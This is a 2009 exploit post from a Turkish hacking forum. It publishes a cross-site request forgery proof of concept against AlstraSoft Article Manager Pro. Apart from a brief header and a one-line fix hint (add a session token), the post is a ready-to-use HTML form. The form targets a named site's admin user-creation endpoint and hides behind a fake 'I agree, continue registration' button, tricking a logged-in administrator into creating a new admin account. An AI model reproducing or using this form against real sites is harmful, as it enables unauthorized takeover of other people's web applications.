AlstraSoft Article Manager Pro ~ XSRF Vuln. | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > AlstraSoft Article Manager Pro ~ XSRF Vuln.

Madde
	Author : Bug Researchers/CWH1RLPOOL
	Date : 13.09.2009 20:27:09
	# AlstraSoft Article Manager Pro ~ XSRF Vuln. [Full Screen Display]

	< ------------------- header data start ------------------- > ############################################################# # Application Name :AlstraSoft Article Manager Pro # vulnerable Type : xsrf # Infection : Yeni Bir Admin Eklenebilinir. # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli. # author : BUG RESEARCHERS//CWH1RLPOOL ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <form method=post cellpadding=8 action=http://www.blizsoft.com/articles/admin//admin.php?action=add_user_query enctype=multipart/form-data> <input type=text name=a_username> <input type=text name=a_pass1> <input type=text name=a_pass2> <input type=text name=a_email> <input type=text name=a_location> <input type=text value=http://www. name=a_website> <input type=file name=a_img_file> <input type=submit value=I agree, continue registration> </form> < -- bug code end of -- >